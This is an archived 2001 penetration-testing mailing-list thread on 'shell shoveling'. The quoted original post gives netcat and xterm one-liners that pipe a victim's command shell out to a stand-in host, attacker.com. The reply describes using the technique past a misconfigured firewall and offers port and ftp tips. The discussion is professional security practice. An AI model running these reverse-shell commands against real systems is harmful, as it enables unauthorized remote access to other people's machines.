Penetration Testing mailing list archives
Re:Shell Shoveling?!?
From: "bluefur0r bluefur0r" <bluefur0r () drea ms>
Date: 2 Oct 2001 19:05:44 -0000
Thats rather amusing, because i used that exact command last night... Except i changed the ports because of firewall reasons... The reason I had to use it because they were running BlackIce on the webserver and a fw1 box was in front of that as well. A misconfigured Firewall allowed out bound transmissions, and hence that exact command came into play. I suggest trying higher ports and not using port 80, i bet you 5 Dollars if you attempt to setup a listener on port 80 you'll get hit with nimda before your shell gets to you =). It worked quite well except do not try using commands like ftp (it seemed to mess with my listeners a bit. Instead use the ol' ftp -s: switch and create a file with the list of ftp commands. Hope this helps! blue Op Tue, 2 Oct 2001 11:15:28 -0700 "Junginger, Jeremy" <jjunginger () Calence com> geschreven:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Have you guys ever heard of shell shoveling? In playing with NetCat and reading an infoworld article, I came across a couple of concepts that I found fascinating. Below are the explanations and command lines: "If the attacker machine is listening with netcat on TCP 80 and 25, and TCP 80 is allowed inbound and 25 outbound to/from the victim through the firewall, then this command "shovels" a remote command shell from victim to attacker.com." nc attacker.com 80 | cmd.exe | nc attacker.com 25 "If Xterm (TCP 6000) is allowed outbound without restriction, then the following command would be a nifty Unix equivalent to the above example:" xterm -display attacker.com:0.0 & I am planning on using this in an upcomint p.t. and wanted to gain your insights! Thanks! -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO7oEDKlk83sSWEI4EQJT5gCgoed9mdrH4FMkU1vse5zBg1fkiqcAnAsv 0Em+lFGcjjX00Jd6eTEGSSFw =BUzY -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
================================================================= Kies een origineel e-mailadres op www.emails.nl ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Shell Shoveling?!? Junginger, Jeremy (Oct 02)
- <Possible follow-ups>
- Re:Shell Shoveling?!? bluefur0r bluefur0r (Oct 04)
- RE: Shell Shoveling?!? Frank Knobbe (Oct 04)